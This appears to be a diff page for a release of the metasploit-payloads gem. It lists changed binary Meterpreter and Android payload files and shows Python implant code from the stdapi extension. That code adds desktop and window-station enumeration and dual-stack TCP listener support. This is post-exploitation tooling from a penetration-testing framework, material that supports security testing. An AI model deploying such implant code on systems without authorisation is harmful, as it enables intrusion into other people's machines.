metasploit-payloads 2.0.105 → 2.0.107
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data/data/android/meterpreter.jar +0 -0
- data/data/android/metstage.jar +0 -0
- data/data/android/shell.jar +0 -0
- data/data/meterpreter/elevator.x64.debug.dll +0 -0
- data/data/meterpreter/elevator.x64.dll +0 -0
- data/data/meterpreter/elevator.x86.debug.dll +0 -0
- data/data/meterpreter/elevator.x86.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x64.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x86.dll +0 -0
- data/data/meterpreter/ext_server_espia.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_espia.x64.dll +0 -0
- data/data/meterpreter/ext_server_espia.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_espia.x86.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x64.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x86.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x64.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x86.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x64.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x86.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x64.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x86.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x64.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x86.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x64.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x86.dll +0 -0
- data/data/meterpreter/ext_server_priv.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_priv.x64.dll +0 -0
- data/data/meterpreter/ext_server_priv.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_priv.x86.dll +0 -0
- data/data/meterpreter/ext_server_python.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_python.x64.dll +0 -0
- data/data/meterpreter/ext_server_python.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_python.x86.dll +0 -0
- data/data/meterpreter/ext_server_sniffer.x64.dll +0 -0
- data/data/meterpreter/ext_server_sniffer.x86.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.py +111 -8
- data/data/meterpreter/ext_server_stdapi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x64.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x86.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x64.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x86.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x64.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x86.dll +0 -0
- data/data/meterpreter/metsrv.x64.debug.dll +0 -0
- data/data/meterpreter/metsrv.x64.dll +0 -0
- data/data/meterpreter/metsrv.x86.debug.dll +0 -0
- data/data/meterpreter/metsrv.x86.dll +0 -0
- data/data/meterpreter/screenshot.x64.debug.dll +0 -0
- data/data/meterpreter/screenshot.x64.dll +0 -0
- data/data/meterpreter/screenshot.x86.debug.dll +0 -0
- data/data/meterpreter/screenshot.x86.dll +0 -0
- data/lib/metasploit-payloads/version.rb +1 -1
- data.tar.gz.sig +0 -0
- metadata +2 -2
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 3d10d21369dd0b6ba5264a4aee52e159c5e50f46cc16ecd41667f2c59a270d7a
|
4
|
+
data.tar.gz: 7c8c3a6e15e0fe818931966bac23b89f63e0c84f73afbf662d477a43d397fcb1
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: c1ed02c18e6180bdf9fe1d63494f44ad3d8301ae24ec9fbdefca7fae136f04177f066bad5c7b259e96e3ceed4ad06c4b613f8300583d7520e4dbdc2451a0442c
|
7
|
+
data.tar.gz: 2bf215c24e59beb8e5198570ed321c23d96c054d3cc523c56160faee54e84d26b4f40ffca241f30fc9d08a6c4c1337e1ae225b6c63d1bcab05fe0a7fcdc2c1bf
|
checksums.yaml.gz.sig
CHANGED
Binary file
|
Binary file
|
data/data/android/metstage.jar
CHANGED
Binary file
|
data/data/android/shell.jar
CHANGED
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
@@ -1,4 +1,5 @@
|
|
1
1
|
import fnmatch
|
2
|
+
import functools
|
2
3
|
import getpass
|
3
4
|
import os
|
4
5
|
import platform
|
@@ -669,7 +670,11 @@ TLV_TYPE_TERMINAL_COLUMNS = TLV_META_TYPE_UINT | 2601
|
|
669
670
|
##
|
670
671
|
TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000
|
671
672
|
TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001
|
672
|
-
|
673
|
+
|
674
|
+
TLV_TYPE_DESKTOP = TLV_META_TYPE_GROUP | 3004
|
675
|
+
TLV_TYPE_DESKTOP_SESSION = TLV_META_TYPE_UINT | 3005
|
676
|
+
TLV_TYPE_DESKTOP_STATION = TLV_META_TYPE_STRING | 3006
|
677
|
+
TLV_TYPE_DESKTOP_NAME = TLV_META_TYPE_STRING | 3007
|
673
678
|
|
674
679
|
##
|
675
680
|
# Event Log
|
@@ -744,6 +749,9 @@ VER_PLATFORM_WIN32s = 0x0000
|
|
744
749
|
VER_PLATFORM_WIN32_WINDOWS = 0x0001
|
745
750
|
VER_PLATFORM_WIN32_NT = 0x0002
|
746
751
|
|
752
|
+
# Windows Access Controls
|
753
|
+
MAXIMUM_ALLOWED = 0x02000000
|
754
|
+
|
747
755
|
WIN_AF_INET = 2
|
748
756
|
WIN_AF_INET6 = 23
|
749
757
|
|
@@ -1125,15 +1133,24 @@ def channel_open_stdapi_net_tcp_client(request, response):
|
|
1125
1133
|
|
1126
1134
|
@register_function
|
1127
1135
|
def channel_open_stdapi_net_tcp_server(request, response):
|
1128
|
-
|
1136
|
+
use_dual_stack = False
|
1137
|
+
local_host = packet_get_tlv(request, TLV_TYPE_LOCAL_HOST).get('value', '')
|
1129
1138
|
local_port = packet_get_tlv(request, TLV_TYPE_LOCAL_PORT)['value']
|
1130
|
-
|
1131
|
-
|
1132
|
-
|
1133
|
-
|
1134
|
-
|
1139
|
+
if local_host:
|
1140
|
+
local_address_info = getaddrinfo(local_host, local_port, socktype=socket.SOCK_STREAM, proto=socket.IPPROTO_TCP, flags=socket.AI_NUMERICHOST)
|
1141
|
+
if not local_address_info:
|
1142
|
+
return ERROR_FAILURE, response
|
1143
|
+
local_address_info = local_address_info[0]
|
1144
|
+
else:
|
1145
|
+
local_address_info = {
|
1146
|
+
'family': socket.AF_INET6,
|
1147
|
+
'sockaddr': ('::', local_port, 0, 0)
|
1148
|
+
}
|
1149
|
+
use_dual_stack = hasattr(socket, 'IPV6_V6ONLY')
|
1150
|
+
debug_print('[*] no local host information, binding to all available interfaces...')
|
1151
|
+
server_sock = socket.socket(local_address_info['family'], socket.SOCK_STREAM, socket.IPPROTO_TCP)
|
1135
1152
|
server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
1136
|
-
if local_address_info['family'] == socket.AF_INET6 and
|
1153
|
+
if local_address_info['family'] == socket.AF_INET6 and use_dual_stack:
|
1137
1154
|
server_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
|
1138
1155
|
server_sock.bind(local_address_info['sockaddr'])
|
1139
1156
|
server_sock.listen(socket.SOMAXCONN)
|
@@ -2773,6 +2790,92 @@ def stdapi_ui_get_idle_time(request, response):
|
|
2773
2790
|
response += tlv_pack(TLV_TYPE_IDLE_TIME, idle_time)
|
2774
2791
|
return ERROR_SUCCESS, response
|
2775
2792
|
|
2793
|
+
@register_function_if(has_windll)
|
2794
|
+
def stdapi_ui_desktop_enum(request, response):
|
2795
|
+
|
2796
|
+
response_parts = []
|
2797
|
+
if ctypes.sizeof(ctypes.c_long) == ctypes.sizeof(ctypes.c_void_p):
|
2798
|
+
LPARAM = ctypes.c_long
|
2799
|
+
elif ctypes.sizeof(ctypes.c_longlong) == ctypes.sizeof(ctypes.c_void_p):
|
2800
|
+
LPARAM = ctypes.c_longlong
|
2801
|
+
|
2802
|
+
DESKTOPENUMPROCA = ctypes.WINFUNCTYPE(ctypes.c_long, ctypes.c_char_p, LPARAM)
|
2803
|
+
EnumDesktopsA = ctypes.windll.user32.EnumDesktopsA
|
2804
|
+
EnumDesktopsA.argtypes = [ctypes.c_void_p, DESKTOPENUMPROCA, LPARAM]
|
2805
|
+
EnumDesktopsA.restype = ctypes.c_long
|
2806
|
+
|
2807
|
+
WINSTAENUMPROCA = ctypes.WINFUNCTYPE(ctypes.c_long, ctypes.c_char_p, LPARAM)
|
2808
|
+
EnumWindowStationsA = ctypes.windll.user32.EnumWindowStationsA
|
2809
|
+
EnumWindowStationsA.argtypes = [WINSTAENUMPROCA, LPARAM]
|
2810
|
+
EnumWindowStationsA.restype = ctypes.c_long
|
2811
|
+
|
2812
|
+
OpenWindowStationA = ctypes.windll.user32.OpenWindowStationA
|
2813
|
+
OpenWindowStationA.argtypes = [ctypes.c_char_p, ctypes.c_long, ctypes.c_bool]
|
2814
|
+
OpenWindowStationA.restype = ctypes.c_void_p
|
2815
|
+
|
2816
|
+
CloseWindowStation = ctypes.windll.user32.CloseWindowStation
|
2817
|
+
CloseWindowStation.argtypes = [ctypes.c_void_p]
|
2818
|
+
CloseWindowStation.restype = ctypes.c_long
|
2819
|
+
|
2820
|
+
GetCurrentProcessId = ctypes.windll.kernel32.GetCurrentProcessId
|
2821
|
+
GetCurrentProcessId.restype = ctypes.c_ulong
|
2822
|
+
|
2823
|
+
GetProcAddress = ctypes.windll.kernel32.GetProcAddress
|
2824
|
+
GetProcAddress.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
|
2825
|
+
GetProcAddress.restype = ctypes.c_void_p
|
2826
|
+
|
2827
|
+
def get_session_id(pid):
|
2828
|
+
dwSessionId = ctypes.c_ulong(0)
|
2829
|
+
|
2830
|
+
ProcessIdToSessionId = ctypes.windll.kernel32.ProcessIdToSessionId
|
2831
|
+
ProcessIdToSessionId.argtypes = [ctypes.c_ulong, ctypes.POINTER(ctypes.c_ulong)]
|
2832
|
+
ProcessIdToSessionId.restype = ctypes.c_bool
|
2833
|
+
|
2834
|
+
if not ProcessIdToSessionId(ctypes.c_ulong(pid), ctypes.byref(dwSessionId)):
|
2835
|
+
dwSessionId = ctypes.c_ulong(-1)
|
2836
|
+
|
2837
|
+
return dwSessionId
|
2838
|
+
|
2839
|
+
|
2840
|
+
def desktop_enumdesktops_callback(response_parts, session_id, station_name, lpszDesktop, lParam):
|
2841
|
+
if not station_name or not lpszDesktop:
|
2842
|
+
return True
|
2843
|
+
|
2844
|
+
entry = bytes()
|
2845
|
+
entry += tlv_pack(TLV_TYPE_DESKTOP_SESSION, session_id)
|
2846
|
+
entry += tlv_pack(TLV_TYPE_DESKTOP_STATION, station_name)
|
2847
|
+
entry += tlv_pack(TLV_TYPE_DESKTOP_NAME, lpszDesktop.decode())
|
2848
|
+
|
2849
|
+
response_parts.append(tlv_pack(TLV_TYPE_DESKTOP, entry))
|
2850
|
+
|
2851
|
+
return True
|
2852
|
+
|
2853
|
+
@WINSTAENUMPROCA
|
2854
|
+
def desktop_enumstations_callback(lpszWindowStation, lParam):
|
2855
|
+
hWindowStation = OpenWindowStationA(lpszWindowStation, False, MAXIMUM_ALLOWED)
|
2856
|
+
if not hWindowStation:
|
2857
|
+
return True
|
2858
|
+
|
2859
|
+
callback = functools.partial(desktop_enumdesktops_callback, response_parts)
|
2860
|
+
session_id = get_session_id(GetCurrentProcessId()).value
|
2861
|
+
station_name = lpszWindowStation.decode()
|
2862
|
+
callback = functools.partial(desktop_enumdesktops_callback, response_parts, session_id, station_name)
|
2863
|
+
callback = DESKTOPENUMPROCA(callback)
|
2864
|
+
EnumDesktopsA(hWindowStation, callback, 0)
|
2865
|
+
|
2866
|
+
if hWindowStation:
|
2867
|
+
CloseWindowStation(hWindowStation)
|
2868
|
+
|
2869
|
+
return True
|
2870
|
+
|
2871
|
+
success = EnumWindowStationsA(desktop_enumstations_callback, 0)
|
2872
|
+
if not success:
|
2873
|
+
return error_result_windows(), response
|
2874
|
+
|
2875
|
+
response += bytes().join(response_parts)
|
2876
|
+
|
2877
|
+
return ERROR_SUCCESS, response
|
2878
|
+
|
2776
2879
|
@register_function_if(has_termios and has_fcntl)
|
2777
2880
|
def stdapi_sys_process_set_term_size(request, response):
|
2778
2881
|
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
data.tar.gz.sig
CHANGED
Binary file
|
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: metasploit-payloads
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 2.0.
|
4
|
+
version: 2.0.107
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- OJ Reeves
|
@@ -96,7 +96,7 @@ cert_chain:
|
|
96
96
|
EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
|
97
97
|
9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
|
98
98
|
-----END CERTIFICATE-----
|
99
|
-
date:
|
99
|
+
date: 2023-01-13 00:00:00.000000000 Z
|
100
100
|
dependencies:
|
101
101
|
- !ruby/object:Gem::Dependency
|
102
102
|
name: rake
|
metadata.gz.sig
CHANGED
Binary file
|